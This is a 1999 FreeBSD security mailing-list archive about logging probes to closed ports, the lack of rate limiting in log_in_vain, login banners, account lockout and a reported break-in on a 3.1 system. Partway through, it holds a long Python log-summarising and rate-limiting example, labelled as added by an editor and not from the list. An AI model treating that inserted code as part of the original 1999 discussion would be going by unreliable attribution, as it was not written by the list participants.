From: Jason Garman To: wkt@cs.adfa.edu.au Cc: security@FreeBSD.ORG Subject: Re: TCP connect data logger Message-ID: <19990525012032.A25197@fw.garman.net> Reply-To: garman@earthling.net References: <19990525000758.A14670@fw.garman.net> <199905250414.OAA03109@henry.cs.adfa.edu.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <199905250414.OAA03109@henry.cs.adfa.edu.au>; from Warren Toomey on Tue, May 25, 1999 at 02:14:06PM +1000 X-Phase-Of-Moon: The Moon is Waxing Gibbous (78% of Full) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Tue, May 25, 1999 at 02:14:06PM +1000, Warren Toomey wrote:
> The sysctl net.inet.udp.log_in_vain option seems to be the one.
> Maybe it doesn't log the contents, just some of the headers.
> I haven't used it yet.

Last time I used this option (2.2.8-RELEASE), it only logged the packet headers to syslog. Something like this:

    Connection attempt to UDP x.x.x.x:port from y.y.y.y:port

There's also a tunable net.inet.tcp.log_in_vain which does the same thing for TCP packets.
enjoy -- Jason Garman http://wedgie.org/ Student, University of Maryland garman@earthling.net Story of the week: Whois: JAG145 http://www.theonion.com/onion3518/telemarketing_sale.html To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 22:39:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 0801514DF1 for ; Mon, 24 May 1999 22:39:20 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id XAA11926; Mon, 24 May 1999 23:39:09 -0600 (MDT) Message-Id: <4.2.0.37.19990524233825.00c03bd0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta) Date: Mon, 24 May 1999 23:39:04 -0600 To: wkt@cs.adfa.edu.au, freebsd-security@FreeBSD.ORG 
From: Brett Glass Subject: Re: TCP connect data logger In-Reply-To: <199905250213.MAA02815@henry.cs.adfa.edu.au> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

That really sucks! But in a good way. ;-) I'd like to see it as a package.

--Brett Glass

At 12:13 PM 5/25/99 +1000, Warren Toomey wrote:
>This is strictly off-topic for FreeBSD, but anyway ... A few people desired
>to know why someone was attacking port X on their box. Ages ago, I wrote a
>small program, tcpsuck, that is run from inetd. Tcpsuck sits on a port and
>logs the data coming in. It stops after a pre-defined timeout, or when the
>remote end breaks the connection.

From owner-freebsd-security Mon May 24 22:46:29 1999 Delivered-To: freebsd-security@freebsd.org Received: from henry.cs.adfa.edu.au (henry.cs.adfa.edu.au [131.236.21.158]) by hub.freebsd.org (Postfix) with ESMTP id 912AB14E31 for ; Mon, 24 May 1999 22:46:23 -0700 (PDT) (envelope-from wkt@henry.cs.adfa.edu.au) Received: (from wkt@localhost) by henry.cs.adfa.edu.au (8.9.2/8.9.1) id PAA03512 for security@freebsd.org; Tue, 25 May 1999 15:46:23 +1000 (EST) (envelope-from wkt)
From: Warren Toomey Message-Id: <199905250546.PAA03512@henry.cs.adfa.edu.au> Subject: Re: TCP connect data logger In-Reply-To: <4.2.0.37.19990524233825.00c03bd0@localhost> from Brett Glass at "May 24, 1999 11:39: 4 pm" To: security@freebsd.org Date: Tue, 25 May 1999 15:46:23 +1000 (EST) Reply-To: wkt@cs.adfa.edu.au X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In article by Brett Glass: > That really sucks! But in a good way. ;-) I'd like to see it as a package. Well, compiling is pretty easy. You obviously have to modify inetd.conf manually. Is it really worth making it a package, given the extent of the manual configuration? I'd probably prefer a port. Suggestions? Warren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 25 1: 7: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from volodya.prime.net.ua (volodya.prime.net.ua [195.64.229.17]) by hub.freebsd.org (Postfix) with ESMTP id C1675155E7 for ; Tue, 25 May 1999 01:06:56 -0700 (PDT) (envelope-from andyo@prime.net.ua) Received: from prime.net.ua (localhost [127.0.0.1]) by volodya.prime.net.ua (8.9.3/8.8.8) with ESMTP id AAA11330 for ; Tue, 25 May 1999 00:48:08 +0300 (EEST) (envelope-from andyo@prime.net.ua) Message-ID: <3749C917.F7407C39@prime.net.ua> Date: Tue, 25 May 1999 00:48:07 +0300 
From: "Andy V. Oleynik" Organization: M-Info X-Mailer: Mozilla 4.6 [en] (X11; I; FreeBSD 3.2-BETA i386) X-Accept-Language: ru, en MIME-Version: 1.0 To: security@FreeBSD.ORG Subject: Re: Denial of service attack from "imagelock.com" References: <4.2.0.37.19990522105949.0465d4a0@localhost> <199905221714.KAA74179@apollo.backplane.com> <009401bea570$09546a80$5f64a8c0@crackhouse.com> <199905241603.KAA11763@mt.sri.com> Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

I don't know about -current. But in 3.2-S, if traceroute doesn't use UDP then its man page is completely inadequate. It says traceroute does UDP!

Dag-Erling Smorgrav wrote:
> Nate Williams writes:
> > > "Bert Kellerman" writes:
> > > > You need UDP connectivity to perform a successful traceroute from a UNIX
> > > > client..not TCP. [...]
> > > Bullshit. RTFM.
> > DES, you don't know what you're talking about. A ping doesn't require
> > UDP, but traceroute certainly does.
>
> No it does not. At least not in -current.
>
> DES
> --
> Dag-Erling Smorgrav - des@flood.ping.uio.no

-- WBW Andy V.
Oleynik (When U work in virtual office U have good chance to obtain virtual money ö%-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 26 9:31:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from kaa.kfunigraz.ac.at (KAA16.kfunigraz.ac.at [143.50.16.17]) by hub.freebsd.org (Postfix) with ESMTP id D37ED15601 for ; Wed, 26 May 1999 09:31:15 -0700 (PDT) (envelope-from dada@balu.kfunigraz.ac.at) Received: from balu.kfunigraz.ac.at (balu [143.50.16.16]) by kaa.kfunigraz.ac.at (8.9.2/8.9.2) with ESMTP id SAA15111 for ; Wed, 26 May 1999 18:30:33 +0200 (MDT) Received: from localhost.kfunigraz.ac.at (IDENT:L7jsz3pAXabCCNDJ4Ud1DYPyv9psnGSG@BONLINE15.kfunigraz.ac.at [143.50.169.15]) by balu.kfunigraz.ac.at (8.9.2/8.9.2) with ESMTP id SAA14279 for ; Wed, 26 May 1999 18:31:05 +0200 (MDT) Received: from localhost (hnZPB4S1Xe1ihcBBPxlijOToMRjgAt+k@localhost.kfunigraz.ac.at [127.0.0.1]) by localhost.kfunigraz.ac.at (8.8.8/x.y.z) with SMTP id OAA08687 for ; Wed, 26 May 1999 14:05:14 +0200 (CEST) (envelope-from dada@localhost.kfunigraz.ac.at) Date: Wed, 26 May 1999 14:05:14 +0200 (CEST) 
From: Martin Kammerhofer Reply-To: Martin Kammerhofer To: security@FreeBSD.ORG Subject: Re: TCP connect data logger In-Reply-To: <19990525012032.A25197@fw.garman.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 25 May 1999, Jason Garman wrote: > Last time I used this option (2.2.8-RELEASE), it only logged the packet > headers to syslog. Something like this: > > Connection attempt to UDP x.x.x.x:port from y.y.y.y:port > > theres also a tunable net.inet.tcp.log_in_vain which does the same thing > for TCP packets. > Both udp.log_in_vain and tcp.log_in_vain have *no* rate limiting. Enabling them can generate huge amounts of LOG_INFO messages during port scans. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 27 0:25:16 1999 Delivered-To: freebsd-security@freebsd.org Received: from axl.noc.iafrica.com (axl.noc.iafrica.com [196.31.1.175]) by hub.freebsd.org (Postfix) with ESMTP id 512FE15777 for ; Thu, 27 May 1999 00:25:08 -0700 (PDT) (envelope-from sheldonh@axl.noc.iafrica.com) Received: from sheldonh (helo=axl.noc.iafrica.com) by axl.noc.iafrica.com with local-esmtp (Exim 3.00 #1) id 10muX0-000Ge2-00; Thu, 27 May 1999 09:24:46 +0200 
From: Sheldon Hearn To: Martin Kammerhofer Cc: security@FreeBSD.ORG Subject: Re: TCP connect data logger In-reply-to: Your message of "Wed, 26 May 1999 14:05:14 +0200." Date: Thu, 27 May 1999 09:24:46 +0200 Message-ID: <63985.927789886@axl.noc.iafrica.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Wed, 26 May 1999 14:05:14 +0200, Martin Kammerhofer wrote:
> Both udp.log_in_vain and tcp.log_in_vain have *no* rate limiting.
> Enabling them can generate huge amounts of LOG_INFO messages during
> port scans.

That's why they're only really useful if syslog writes their output away from sensitive filesystems like /var.

There's a lot of material in the archives of this list regarding suitable alternatives (printers, remote syslogds, dedicated filesystems etc.) so there's no need for us to rehash that now. :-)

If I remember correctly, it takes a source hack to get the messages out of the mainstream on a LOG_LOCAL? facility.

Ciao, Sheldon.

From owner-freebsd-security Thu May 27 1: 6:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from kaa.kfunigraz.ac.at (KAA16.kfunigraz.ac.at [143.50.16.17]) by hub.freebsd.org (Postfix) with ESMTP id E5AAB14E9D for ; Thu, 27 May 1999 01:06:32 -0700 (PDT) (envelope-from dada@balu.kfunigraz.ac.at) Received: from balu.kfunigraz.ac.at (balu [143.50.16.16]) by kaa.kfunigraz.ac.at (8.9.2/8.9.2) with ESMTP id KAA24336 for ; Thu, 27 May 1999 10:05:48 +0200 (MDT) Received: from localhost.kfunigraz.ac.at (IDENT:en7LWWnBqz5Du2Wj0NV9fa5snU2mqp73@BONLINEA51.kfunigraz.ac.at [143.50.36.51]) by balu.kfunigraz.ac.at (8.9.2/8.9.2) with ESMTP id KAA14302 for ; Thu, 27 May 1999 10:06:20 +0200 (MDT) Received: from localhost (i6zwjG/LSCuW/83cYGbKp6y5IkpNEFPi@localhost.kfunigraz.ac.at [127.0.0.1]) by localhost.kfunigraz.ac.at (8.8.8/x.y.z) with SMTP id KAA00491 for ; Thu, 27 May 1999 10:00:38
+0200 (CEST) (envelope-from dada@localhost.kfunigraz.ac.at) Date: Thu, 27 May 1999 10:00:38 +0200 (CEST) 
From: Martin Kammerhofer Reply-To: Martin Kammerhofer To: security@FreeBSD.ORG Subject: Re: TCP connect data logger In-Reply-To: <63985.927789886@axl.noc.iafrica.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 27 May 1999, Sheldon Hearn wrote: > On Wed, 26 May 1999 14:05:14 +0200, Martin Kammerhofer wrote: > > > Both udp.log_in_vain and tcp.log_in_vain have *no* rate limiting. > > Enabling them can generate huge amounts of LOG_INFO messages during > > port scans. > > That's why they're only really useful if syslog writing their output > away from sensitive filesystems like /var. > > There's a lot of material in the archives of this list regarding > suitable alternatives (printers, remote syslogd's, dedicated filesystems > etc.) so there's no need for us to rehash that now. :-) > You are suggesting the choice of redirecting the disk filling service? This sounds to me like exporting toxic waste to preserve the environment. There is a need for rate limiting and it should be implemented. It can be done in a few LOC. 
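An added example from the editor, not code from Martin's message, from the list, or from FreeBSD: a userland sketch of the two things this thread asks for, a per-source rate limiter of the "few LOC" kind and a summary of the log_in_vain lines Jason quoted (format `Connection attempt to TCP a.b.c.d:port from w.x.y.z:port`) that flags probable port scans instead of logging every probe. The syslog prefix, the thresholds and the sample lines are constructed for the example.

```python
"""Aggregate and rate-limit FreeBSD log_in_vain messages (added example).

Message text follows the form quoted on the list:
    Connection attempt to TCP 10.0.0.5:23 from 192.0.2.7:40001
The syslog prefix in SAMPLE ("May 26 14:05:14 gw /kernel: ") is an
assumption; only the "Connection attempt ..." part is matched.
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

LOG_RE = re.compile(
    r"Connection attempt to (?P<proto>TCP|UDP) "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+):(?P<dport>\d+) "
    r"from (?P<src>\d+\.\d+\.\d+\.\d+):(?P<sport>\d+)"
)


def parse_line(line: str) -> Optional[dict]:
    """Return the fields of one log_in_vain message, or None for other lines."""
    m = LOG_RE.search(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["dport"] = int(rec["dport"])
    rec["sport"] = int(rec["sport"])
    return rec


class RateLimiter:
    """Allow at most `burst` events per `interval` seconds for each key.

    Suppressed events are counted rather than dropped silently, so a port
    scan produces a handful of lines plus a count instead of a full /var.
    """

    def __init__(self, burst: int, interval: float) -> None:
        self.burst = burst
        self.interval = interval
        self._window: Dict[str, Tuple[float, int]] = {}
        self.suppressed: Dict[str, int] = defaultdict(int)

    def allow(self, key: str, now: float) -> bool:
        start, count = self._window.get(key, (now, 0))
        if now - start >= self.interval:      # window expired: start afresh
            start, count = now, 0
        if count < self.burst:
            self._window[key] = (start, count + 1)
            return True
        self._window[key] = (start, count)
        self.suppressed[key] += 1
        return False


def summarize(lines: List[str], scan_ports: int = 10,
              burst: int = 5, interval: float = 60.0) -> dict:
    """Parse lines, rate-limit per source and flag sources touching many ports.

    Timestamps are synthetic (one second per line), enough to drive the
    limiter through a burst without parsing the syslog date.
    """
    limiter = RateLimiter(burst, interval)
    ports_by_src: Dict[str, set] = defaultdict(set)
    logged: List[str] = []
    for i, line in enumerate(lines):
        rec = parse_line(line)
        if rec is None:
            continue
        ports_by_src[rec["src"]].add((rec["proto"], rec["dport"]))
        if limiter.allow(rec["src"], float(i)):
            logged.append(f'{rec["src"]} -> {rec["proto"]}/{rec["dport"]}')
    scanners = sorted(s for s, p in ports_by_src.items() if len(p) >= scan_ports)
    return {"logged": logged, "suppressed": dict(limiter.suppressed),
            "scanners": scanners}


# Constructed sample: one host walks 20 ports, another makes a single UDP hit,
# and one unrelated syslog line is mixed in.
SAMPLE = [
    f"May 26 14:05:{i:02d} gw /kernel: Connection attempt to TCP 10.0.0.5:{p} "
    f"from 192.0.2.7:{40000 + i}"
    for i, p in enumerate(range(1, 21))
] + [
    "May 26 14:06:00 gw /kernel: Connection attempt to UDP 10.0.0.5:161 from 198.51.100.9:1024",
    "May 26 14:06:01 gw sshd[123]: unrelated line",
]

if __name__ == "__main__":
    result = summarize(SAMPLE)
    print(f"logged {len(result['logged'])} of {len(SAMPLE)} lines; "
          f"suppressed per source: {result['suppressed']}; "
          f"probable scanners: {result['scanners']}")
```

With the defaults, the 20-port sweep yields five logged lines, fifteen suppressed, and one flagged source; the single UDP probe is logged normally. The same window-and-count logic is what a kernel-side limiter on the log_in_vain printf would need.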
Regards, Martin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 27 5:27:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from hawk.gnome.co.uk (gnome.gw.cerbernet.net [193.243.224.22]) by hub.freebsd.org (Postfix) with ESMTP id CE8D914FCC for ; Thu, 27 May 1999 05:27:10 -0700 (PDT) (envelope-from jacs@hawk.gnome.co.uk) Received: from hawk.gnome.co.uk (localhost [127.0.0.1]) by hawk.gnome.co.uk (8.9.3/8.9.3) with ESMTP id NAA09689 for ; Thu, 27 May 1999 13:27:07 +0100 (BST) (envelope-from jacs@hawk.gnome.co.uk) Message-Id: <199905271227.NAA09689@hawk.gnome.co.uk> X-Mailer: exmh version 2.0.2 2/24/98 To: security@freebsd.org Subject: masqueraded attacks Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 27 May 1999 13:27:03 +0100 
From: Chris Stenton Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I have had a couple of attempted attacks from a masqueraded host. Is there any way to get ipfw to give the "route via" info from the attacking data stream? Chris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 27 10:50:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id 0209914F99 for ; Thu, 27 May 1999 10:50:31 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id KAA21704; Thu, 27 May 1999 10:49:45 -0700 (PDT) Received: from omni.xylan.com by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id KAA25452; Thu, 27 May 1999 10:49:45 -0700 Received: from softweyr.com (dyn2.utah.xylan.com) by omni.xylan.com (4.1/SMI-4.1 (xylan engr [SPOOL])) id AA27431; Thu, 27 May 99 10:49:39 PDT Message-Id: <374D85B2.2C12599@softweyr.com> Date: Thu, 27 May 1999 11:49:38 -0600 
From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en Mime-Version: 1.0 To: Martin Kammerhofer Cc: security@FreeBSD.ORG Subject: Re: TCP connect data logger References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Martin Kammerhofer wrote: > > You are suggesting the choice of redirecting the disk filling service? > This sounds to me like exporting toxic waste to preserve the environment. Hey, a new FreeBSD business opportunity! Syslog servers in remote locations! Anybody know a VC or two? I'll run the server in Tahiti! ;^) -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 27 19:10:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from zip.com.au (zipper.zip.com.au [203.12.97.1]) by hub.freebsd.org (Postfix) with ESMTP id 6A26414CAC for ; Thu, 27 May 1999 19:10:18 -0700 (PDT) (envelope-from ncb@zip.com.au) Received: from localhost (ncb@localhost) by zip.com.au (8.9.1/8.9.1) with ESMTP id MAA04449 for ; Fri, 28 May 1999 12:10:28 +1000 Date: Fri, 28 May 1999 12:10:27 +1000 (EST) 
From: Nicholas Brawn To: freebsd-security@freebsd.org Subject: Locking out accounts after repeated failures Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm interested to know if freebsd has the capability to lock out users after 5 consecutive bad login attempts, with the "counter" being cleared after each successful login. If it is capable, could someone please point me to the right documentation/files. Cheers, Nick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 27 19:40:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from zip.com.au (zipper.zip.com.au [203.12.97.1]) by hub.freebsd.org (Postfix) with ESMTP id 7BE9D15146 for ; Thu, 27 May 1999 19:40:31 -0700 (PDT) (envelope-from ncb@zip.com.au) Received: from localhost (ncb@localhost) by zip.com.au (8.9.1/8.9.1) with ESMTP id MAA06545; Fri, 28 May 1999 12:40:35 +1000 Date: Fri, 28 May 1999 12:40:35 +1000 (EST) 
From: Nicholas Brawn To: "Brian W. Buchanan" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Locking out accounts after repeated failures In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Yes. I'm interested in doing it on a bastion host and servers connected to public networks (ie, Internet). Of course the root account would not be locked out, but then you couldn't log in as root except at console. Nick On Thu, 27 May 1999, Brian W. Buchanan wrote: > On Fri, 28 May 1999, Nicholas Brawn wrote: > > > I'm interested to know if freebsd has the capability to lock out users > > after 5 consecutive bad login attempts, with the "counter" being cleared > > after each successful login. If it is capable, could someone please point > > me to the right documentation/files. > > Are you sure you want to do this? This leads to a very obvious denial of > service attack. > > -- > Brian Buchanan brian@CSUA.Berkeley.EDU > -------------------------------------------------------------------------- > FreeBSD - The Power to Serve! http://www.freebsd.org > > daemon(n): 1. an attendant power or spirit : GENIUS > 2. the cute little mascot of the FreeBSD operating system > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 27 22: 0:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from zip.com.au (zipper.zip.com.au [203.12.97.1]) by hub.freebsd.org (Postfix) with ESMTP id BEC0014C80 for ; Thu, 27 May 1999 22:00:48 -0700 (PDT) (envelope-from ncb@zip.com.au) Received: from localhost (ncb@localhost) by zip.com.au (8.9.1/8.9.1) with ESMTP id PAA13388 for ; Fri, 28 May 1999 15:00:59 +1000 Date: Fri, 28 May 1999 15:00:58 +1000 (EST) 
From: Nicholas Brawn To: freebsd-security@freebsd.org Subject: legal notice for telnet/etc Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Which is the correct file to edit to display a legal notice prior to a user logging in? I'm thinking of telnet primarily at this stage.

Cheers, Nick

From owner-freebsd-security Thu May 27 22: 5:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from toto.oz-online.net (toto.oz-online.net [208.149.58.2]) by hub.freebsd.org (Postfix) with SMTP id 6325014C80 for ; Thu, 27 May 1999 22:05:18 -0700 (PDT) (envelope-from chriss@toto.oz-online.net) Received: (qmail 9698 invoked by uid 6819); 28 May 1999 05:12:19 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 28 May 1999 05:12:19 -0000 Date: Fri, 28 May 1999 00:12:19 -0500 (CWT)
From: Chriss To: Nicholas Brawn Cc: freebsd-security@freebsd.org Subject: Re: legal notice for telnet/etc In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

NOTES
    By default telnetd will read the he, hn, and im capabilities from /etc/gettytab and use that information (if present) to determine what to display before the login: prompt. You can also use a System V style /etc/issue file by using the if capability, which will override im. The information specified in either im or if will be displayed to both console and remote logins.

On Fri, 28 May 1999, Nicholas Brawn wrote:
> Which is the correct file to edit to display a legal notice prior to a
> user logging in? I'm thinking of telnet primarily at this stage.
>
> Cheers,
> Nick

From owner-freebsd-security Thu May 27 22:15: 9 1999 Delivered-To: freebsd-security@freebsd.org Received: from arpa.com (rage.arpa.com [199.245.173.3]) by hub.freebsd.org (Postfix) with ESMTP id A2DCD14DBF for ; Thu, 27 May 1999 22:15:07 -0700 (PDT) (envelope-from jamie@arpa.com) Received: (from jamie@localhost) by arpa.com (8.9.3/8.9.3) id AAA29338; Fri, 28 May 1999 00:14:36 -0500 (CDT) Date: Fri, 28 May 1999 00:14:36 -0500
From: Jamie Rishaw To: Chriss Cc: Nicholas Brawn , freebsd-security@FreeBSD.ORG Subject: Re: legal notice for telnet/etc Message-ID: <19990528001436.C28844@rage.arpa.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: ; from Chriss on Fri, May 28, 1999 at 12:12:19AM -0500 X-No-Archive: Yes X-Face: d=) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Note, that doesn't work for ssh. I use /etc/COPYRIGHT for all my must-reads. The only problem is, that's post-login. You can define the copyright file in /etc/login.conf with the ":copyright=" directive.

-jamie

On Fri, May 28, 1999 at 12:12:19AM -0500, Chriss wrote:
> NOTES
>     By default telnetd will read the he, hn, and im capabilities from
>     /etc/gettytab and use that information (if present) to determine what
>     to display before the login: prompt. You can also use a System V
>     style /etc/issue file by using the if capability, which will override
>     im. The information specified in either im or if will be displayed to
>     both console and remote logins.
>
> On Fri, 28 May 1999, Nicholas Brawn wrote:
>
> > Which is the correct file to edit to display a legal notice prior to a
> > user logging in? I'm thinking of telnet primarily at this stage.
> >
> > Cheers,
> > Nick

-- jamie rishaw a friend in need is a friend indeed, but a friend with weed is better.
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 27 22:44:42 1999 Delivered-To: freebsd-security@freebsd.org Received: from ionet.net (mail.ionet.net [206.41.128.16]) by hub.freebsd.org (Postfix) with ESMTP id 7AC82152D1 for ; Thu, 27 May 1999 22:44:39 -0700 (PDT) (envelope-from micheal@ionet.net) Received: from nt (dredster.ionet.net [38.193.50.179]) by ionet.net (8.9.1a/8.9.1) with SMTP id AAA29946; Fri, 28 May 1999 00:47:26 -0500 (CDT) Message-ID: <000f01bea8cd$28dd8200$0201a8c0@dredster.ionet.net> From: "Micheal Patterson" To: "Nicholas Brawn" , References: Subject: Re: legal notice for telnet/etc Date: Fri, 28 May 1999 00:40:52 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2014.211 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2014.211 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org If you're running tcp wrappers, you can use the banner file option. For more information, check out the man page on hosts_options and also check out the Banners.Makefile that comes with the tcp_wrappers port. I believe this will do what you're wanting to do. Micheal Patterson micheal@ionet.net ----- Original Message ----- 
From: Nicholas Brawn To: Sent: Friday, May 28, 1999 12:00 AM Subject: legal notice for telnet/etc
> Which is the correct file to edit to display a legal notice prior to a
> user logging in? I'm thinking of telnet primarily at this stage.
>
> Cheers,
> Nick

From owner-freebsd-security Fri May 28 2:26:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from nic.mmc.net.ge (nic.mmc.net.ge [212.72.145.2]) by hub.freebsd.org (Postfix) with ESMTP id EED2A14F84 for ; Fri, 28 May 1999 02:26:33 -0700 (PDT) (envelope-from dima@nic.mmc.net.ge) Received: (from dima@localhost) by nic.mmc.net.ge (8.9.2/8.8.5) id OAA08009 for security@FreeBSD.org; Fri, 28 May 1999 14:27:23 +0500 (GET) Date: Fri, 28 May 1999 14:27:23 +0500 (GET)
From: Dima Message-Id: <199905280927.OAA08009@nic.mmc.net.ge> To: security@FreeBSD.org Subject: System beeing cracked! Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Hello,

I have 3.1 installed and a friend of mine made a bet that he can hack into my system. He has an ordinary account opened. So, he won! And I'm wondering if there are any security holes in 3.1? He logged in as himself via telnet, then he made himself root (but he was not in the wheel group and of course did not know the root password) and, what is more interesting, he cracked several passwords. He did all this in 2 hours, and the passwords were at least 10 symbols in length, containing different cases and digits. I am using MD5 coding, and as far as I knew it is impossible. Has someone any idea how it was done? Please answer me, as my friend does not tell me anything about this as he feels like a guru-hacker.

Thank you.

From owner-freebsd-security Fri May 28 2:32:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (Postfix) with ESMTP id 5ED8D15094 for ; Fri, 28 May 1999 02:32:20 -0700 (PDT) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id CAA16448; Fri, 28 May 1999 02:31:39 -0700 (PDT) Message-ID: <19990528023139.A15594@best.com> Date: Fri, 28 May 1999 02:31:39 -0700
From: "Jan B. Koum " To: Martin Kammerhofer , security@FreeBSD.ORG Subject: Re: TCP connect data logger References: <19990525012032.A25197@fw.garman.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: ; from Martin Kammerhofer on Wed, May 26, 1999 at 02:05:14PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, May 26, 1999 at 02:05:14PM +0200, Martin Kammerhofer wrote: > On Tue, 25 May 1999, Jason Garman wrote: > > > Last time I used this option (2.2.8-RELEASE), it only logged the packet > > headers to syslog. Something like this: > > > > Connection attempt to UDP x.x.x.x:port from y.y.y.y:port > > > > theres also a tunable net.inet.tcp.log_in_vain which does the same thing > > for TCP packets. > > > > Both udp.log_in_vain and tcp.log_in_vain have *no* rate limiting. > Enabling them can generate huge amounts of LOG_INFO messages during > port scans. > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message You should also note that net.inet.tcp.log_in_vain will ONLY log packets which have SYN bit set. That sucks if you get port scanned by something like nmap which can use FIN scan for example. (Or some other stealth scanning technique). 
